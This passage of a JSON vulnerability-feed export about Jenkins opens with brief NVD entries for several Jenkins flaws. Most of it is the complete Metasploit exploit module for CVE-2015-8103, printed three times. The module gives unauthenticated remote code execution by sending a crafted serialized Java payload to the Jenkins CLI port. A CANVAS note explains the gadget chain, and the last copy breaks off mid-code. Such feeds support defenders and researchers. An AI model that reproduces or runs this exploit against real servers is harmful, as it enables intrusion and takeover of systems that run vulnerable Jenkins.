"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "The Plugins Manager in Jenkins before 1.640 and LTS before 1.625.2 does not verify checksums for 
plugin files referenced in update site data, which makes it easier for man-in-the-middle attackers to execute arbitrary code via a crafted plugin.", "modified": "2016-06-14T00:09:00", "id": "CVE-2015-7539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7539", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7539", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "XML external entity (XXE) vulnerability in the create-job CLI command in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to read arbitrary files via a crafted job configuration that is then used in an \"XML-aware tool,\" as demonstrated by get-job and update-job.\n<a href=\"https://cwe.mitre.org/data/definitions/611.html\">CWE-611: Improper Restriction of XML External Entity Reference ('XXE')</a>", "modified": "2016-06-15T17:13:00", "id": "CVE-2015-5319", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5319", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5319", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 allow attackers to bypass intended slave-to-master access restrictions by leveraging a JNLP slave. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-3665.", "modified": "2016-06-14T00:19:00", "id": "CVE-2015-5325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5325", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5325", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Jenkins before 1.640 and LTS before 1.625.2 allow remote attackers to bypass the CSRF protection mechanism via unspecified vectors.", "modified": "2016-06-14T00:10:00", "id": "CVE-2015-7538", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7538", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7538", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in Jenkins before 1.640 and LTS before 1.625.2 allows remote attackers to hijack the authentication of administrators for requests that have unspecified impact via vectors related to the HTTP GET method.", "modified": "2016-06-14T00:13:00", "id": "CVE-2015-7537", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7537", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7537", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 allow remote attackers to obtain sensitive information via a direct request to queue/api.", "modified": "2016-06-14T00:20:00", "id": "CVE-2015-5324", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5324", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5324", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", 
"description": "Cross-site scripting (XSS) vulnerability in Jenkins before 1.640 and LTS before 1.625.2 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to workspaces and archived artifacts.", "modified": "2016-06-14T00:14:00", "id": "CVE-2015-7536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7536", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7536", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in the slave overview page in Jenkins before 1.638 and LTS before 1.625.2 allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the slave offline status message.", "modified": "2016-06-14T00:15:00", "id": "CVE-2015-5326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5326", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5326", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T09:15:13", "bulletinFamily": "exploit", "description": "Jenkins CLI RMI Java Deserialization Vulnerability. CVE-2015-8103. 
Remote exploit for java platform", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "EDB-ID:38983", "href": "https://www.exploit-db.com/exploits/38983/", "type": "exploitdb", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\r\n required to exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'Christopher Frohoff', # Vulnerability discovery\r\n 'Steve Breen', # Public Exploit\r\n 'Dev Mohanty', # Metasploit module\r\n 'Louis Sato', # Metasploit\r\n 'William Vu', # Metasploit\r\n 'juan vazquez', # Metasploit\r\n 'Wei Chen' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8103'],\r\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\r\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\r\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Jenkins 1.637', {} ]\r\n ],\r\n 'DisclosureDate' => 'Nov 18 2015',\r\n 
'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\r\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\r\n Opt::RPORT('8080')\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\r\n end\r\n invoke_remote_method(set_payload)\r\n invoke_remote_method(class_load_payload)\r\n end\r\n\r\n\r\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\r\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\r\n # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.\r\n\r\n def target_uri\r\n begin\r\n # In case TARGETURI is empty, at least we default to '/'\r\n u = datastore['TARGETURI']\r\n u = \"/\" if u.nil? or u.empty?\r\n URI(u)\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n\r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n\r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n\r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n\r\n new_str\r\n end\r\n\r\n def check\r\n result = Exploit::CheckCode::Safe\r\n\r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n result\r\n end\r\n\r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n\r\n http_headers = res.headers\r\n\r\n unless http_headers['X-Jenkins-CLI-Port']\r\n vprint_error('The 
server does not have the CLI port that is needed for exploitation.')\r\n return false\r\n end\r\n\r\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\r\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\r\n actual_timeout = datastore['HttpClientTimeout']\r\n else\r\n actual_timeout = opts[:timeout] || timeout\r\n end\r\n\r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, actual_timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n\r\n def invoke_remote_method(serialized_java_stream)\r\n begin\r\n socket = connect(true, {'RPORT' => @jenkins_cli_port})\r\n\r\n print_status 'Sending headers...'\r\n socket.put(read_bin_file('serialized_jenkins_header'))\r\n\r\n vprint_status(socket.recv(1024))\r\n vprint_status(socket.recv(1024))\r\n\r\n encoded_payload0 = read_bin_file('serialized_payload_header')\r\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\r\n encoded_payload2 = read_bin_file('serialized_payload_footer')\r\n\r\n encoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\r\n print_status \"Sending payload length: #{encoded_payload.length}\"\r\n socket.put(encoded_payload)\r\n ensure\r\n disconnect(socket)\r\n end\r\n\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{rhost}:#{rport} - #{msg}\")\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\r\n #\r\n def set_payload\r\n stream 
= Rex::Java::Serialization::Model::Stream.new\r\n\r\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n\r\n inject_payload_into_stream(decoded).encode\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\r\n #\r\n def class_load_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n inject_class_loader_into_stream(decoded).encode\r\n end\r\n\r\n def inject_class_loader_into_stream(decoded)\r\n file_name_utf8 = get_array_chain(decoded)\r\n .values[2]\r\n .class_data[0]\r\n .values[1]\r\n .values[0]\r\n .values[0]\r\n .class_data[3]\r\n file_name_utf8.contents = get_random_file_name\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n class_name_utf8 = get_array_chain(decoded)\r\n .values[4]\r\n .class_data[0]\r\n .values[0]\r\n class_name_utf8.contents = 'metasploit.Payload'\r\n class_name_utf8.length = class_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_random_file_name\r\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\r\n end\r\n\r\n def inject_payload_into_stream(decoded)\r\n byte_array = get_array_chain(decoded)\r\n .values[2]\r\n .class_data\r\n .last\r\n byte_array.values = payload.encoded.bytes\r\n file_name_utf8 = decoded.references[44].class_data[0]\r\n rnd_fname = get_random_file_name\r\n register_file_for_cleanup(rnd_fname)\r\n file_name_utf8.contents = rnd_fname\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_array_chain(decoded)\r\n object = 
decoded.contents[0]\r\n lazy_map = object.class_data[1].class_data[0]\r\n chained_transformer = lazy_map.class_data[0]\r\n chained_transformer.class_data[0]\r\n end\r\n\r\n def read_bin_file(bin_file_path)\r\n data = ''\r\n\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\r\n data = f.read\r\n end\r\n\r\n data\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38983/"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:20", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://packetstormsecurity.com/files/134805/Jenkins-CLI-RMI-Java-Deserialization.html", "id": "PACKETSTORM:134805", "type": "packetstorm", "title": "Jenkins CLI RMI Java Deserialization", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on \nthe Jenkins master, which allows remote arbitrary code execution. Authentication is not \nrequired to exploit this vulnerability. 
\n}, \n'Author' => \n[ \n'Christopher Frohoff', # Vulnerability discovery \n'Steve Breen', # Public Exploit \n'Dev Mohanty', # Metasploit module \n'Louis Sato', # Metasploit \n'William Vu', # Metasploit \n'juan vazquez', # Metasploit \n'Wei Chen' # Metasploit \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8103'], \n['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'], \n['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'], \n['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'], \n['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \n], \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'Jenkins 1.637', {} ] \n], \n'DisclosureDate' => 'Nov 18 2015', \n'DefaultTarget' => 0)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']), \nOptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), \nOpt::RPORT('8080') \n], self.class) \nend \n \ndef exploit \nunless vulnerable? \nfail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\") \nend \ninvoke_remote_method(set_payload) \ninvoke_remote_method(class_load_payload) \nend \n \n \n# This is from the HttpClient mixin. But since this module isn't actually exploiting \n# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion & \n# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though. \n \ndef target_uri \nbegin \n# In case TARGETURI is empty, at least we default to '/' \nu = datastore['TARGETURI'] \nu = \"/\" if u.nil? or u.empty? 
\nURI(u) \nrescue ::URI::InvalidURIError \nprint_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\" \nraise Msf::OptionValidateError.new(['TARGETURI']) \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * \"/\" \n \nnew_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\") \n \n# Makes sure there's a starting slash \nunless new_str[0,1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef check \nresult = Exploit::CheckCode::Safe \n \nbegin \nif vulnerable? \nresult = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \nreturn Exploit::CheckCode::Unknown \nend \n \nresult \nend \n \ndef vulnerable? \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path) \n}) \n \nunless res \nfail_with(Failure::Unknown, 'The connection timed out.') \nend \n \nhttp_headers = res.headers \n \nunless http_headers['X-Jenkins-CLI-Port'] \nvprint_error('The server does not have the CLI port that is needed for exploitation.') \nreturn false \nend \n \nif http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637 \n@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i \nreturn true \nend \n \nfalse \nend \n \n# Connects to the server, creates a request, sends the request, \n# reads the response \n# \n# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. \n# \ndef send_request_cgi(opts={}, timeout = 20) \nif datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 \nactual_timeout = datastore['HttpClientTimeout'] \nelse \nactual_timeout = opts[:timeout] || timeout \nend \n \nbegin \nc = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) \nc.connect \nr = c.request_cgi(opts) \nc.send_recv(r, actual_timeout) \nrescue ::Errno::EPIPE, ::Timeout::Error \nnil \nend \nend \n \ndef invoke_remote_method(serialized_java_stream) \nbegin \nsocket = connect(true, {'RPORT' => @jenkins_cli_port}) \n \nprint_status 'Sending headers...' 
\nsocket.put(read_bin_file('serialized_jenkins_header')) \n \nvprint_status(socket.recv(1024)) \nvprint_status(socket.recv(1024)) \n \nencoded_payload0 = read_bin_file('serialized_payload_header') \nencoded_payload1 = Rex::Text.encode_base64(serialized_java_stream) \nencoded_payload2 = read_bin_file('serialized_payload_footer') \n \nencoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\" \nprint_status \"Sending payload length: #{encoded_payload.length}\" \nsocket.put(encoded_payload) \nensure \ndisconnect(socket) \nend \n \nend \n \ndef print_status(msg='') \nsuper(\"#{rhost}:#{rport} - #{msg}\") \nend \n \n# \n# Serialized stream generated with: \n# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java \n# \ndef set_payload \nstream = Rex::Java::Serialization::Model::Stream.new \n \nhandle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb') \ndecoded = stream.decode(handle) \nhandle.close \n \ninject_payload_into_stream(decoded).encode \nend \n \n# \n# Serialized stream generated with: \n# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java \n# \ndef class_load_payload \nstream = Rex::Java::Serialization::Model::Stream.new \nhandle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb') \ndecoded = stream.decode(handle) \nhandle.close \ninject_class_loader_into_stream(decoded).encode \nend \n \ndef inject_class_loader_into_stream(decoded) \nfile_name_utf8 = get_array_chain(decoded) \n.values[2] \n.class_data[0] \n.values[1] \n.values[0] \n.values[0] \n.class_data[3] \nfile_name_utf8.contents = get_random_file_name \nfile_name_utf8.length = file_name_utf8.contents.length \nclass_name_utf8 = get_array_chain(decoded) \n.values[4] \n.class_data[0] \n.values[0] \nclass_name_utf8.contents = 
'metasploit.Payload' \nclass_name_utf8.length = class_name_utf8.contents.length \ndecoded \nend \n \ndef get_random_file_name \n@random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\" \nend \n \ndef inject_payload_into_stream(decoded) \nbyte_array = get_array_chain(decoded) \n.values[2] \n.class_data \n.last \nbyte_array.values = payload.encoded.bytes \nfile_name_utf8 = decoded.references[44].class_data[0] \nrnd_fname = get_random_file_name \nregister_file_for_cleanup(rnd_fname) \nfile_name_utf8.contents = rnd_fname \nfile_name_utf8.length = file_name_utf8.contents.length \ndecoded \nend \n \ndef get_array_chain(decoded) \nobject = decoded.contents[0] \nlazy_map = object.class_data[1].class_data[0] \nchained_transformer = lazy_map.class_data[0] \nchained_transformer.class_data[0] \nend \n \ndef read_bin_file(bin_file_path) \ndata = '' \n \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f| \ndata = f.read \nend \n \ndata \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134805/jenkins_java_deserialize.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T19:48:26", "bulletinFamily": "exploit", "description": "**Name**| jenkins_cli_deserialization \n---|--- \n**CVE**| CVE-2015-8103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| jenkins_cli_deserialization \n**Notes**| CVE Name: CVE-2015-8103 \nVENDOR: Jenkins \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nJenkins has a remote command line interface console. It is often unauthenticated. It communicates \nwith a client by exchanging serialized Java Objects. 
Apache Commons Collections pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransformer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are accessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nNOTE: By default, Jenkins starts its management web application on 0.0.0.0:8080. \nFor this module to work, both the web interface specified above *and* the CLI port specified by the \nX-Jenkins-CLI-Port element in the HTTP response headers from said web interface need to be \naccessible by the CANVAS host. \n \nVersion support: \n> Windows 7 Ultimate SP1 x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n> Ubuntu Linux 14.04.3 - x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.600 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n \nRepeatability: Infinite \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103 \n\n", "modified": "2015-11-25T20:59:00", "published": "2015-11-25T20:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/jenkins_cli_deserialization", "id": "JENKINS_CLI_DESERIALIZATION", "title": "Immunity Canvas: JENKINS_CLI_DESERIALIZATION", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-21T15:32:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. 
Authentication is not required to exploit this vulnerability.", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "1337DAY-ID-24727", "href": "https://0day.today/exploit/description/24727", "type": "zdt", "title": "Jenkins CLI RMI Java Deserialization Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\r\n required to exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'Christopher Frohoff', # Vulnerability discovery\r\n 'Steve Breen', # Public Exploit\r\n 'Dev Mohanty', # Metasploit module\r\n 'Louis Sato', # Metasploit\r\n 'William Vu', # Metasploit\r\n 'juan vazquez', # Metasploit\r\n 'Wei Chen' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8103'],\r\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\r\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\r\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Jenkins 1.637', {} ]\r\n ],\r\n 'DisclosureDate' => 
'Nov 18 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\r\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\r\n Opt::RPORT('8080')\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\r\n end\r\n invoke_remote_method(set_payload)\r\n invoke_remote_method(class_load_payload)\r\n end\r\n\r\n\r\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\r\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\r\n # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.\r\n\r\n def target_uri\r\n begin\r\n # In case TARGETURI is empty, at least we default to '/'\r\n u = datastore['TARGETURI']\r\n u = \"/\" if u.nil? or u.empty?\r\n URI(u)\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n\r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n\r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n\r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n\r\n new_str\r\n end\r\n\r\n def check\r\n result = Exploit::CheckCode::Safe\r\n\r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n result\r\n end\r\n\r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n\r\n http_headers = res.headers\r\n\r\n unless http_headers['X-Jenkins-CLI-Port']\r\n 
vprint_error('The server does not have the CLI port that is needed for exploitation.')\r\n return false\r\n end\r\n\r\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\r\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\r\n actual_timeout = datastore['HttpClientTimeout']\r\n else\r\n actual_timeout = opts[:timeout] || timeout\r\n end\r\n\r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, actual_timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n\r\n def invoke_remote_method(serialized_java_stream)\r\n begin\r\n socket = connect(true, {'RPORT' => @jenkins_cli_port})\r\n\r\n print_status 'Sending headers...'\r\n socket.put(read_bin_file('serialized_jenkins_header'))\r\n\r\n vprint_status(socket.recv(1024))\r\n vprint_status(socket.recv(1024))\r\n\r\n encoded_payload0 = read_bin_file('serialized_payload_header')\r\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\r\n encoded_payload2 = read_bin_file('serialized_payload_footer')\r\n\r\n encoded_payload = 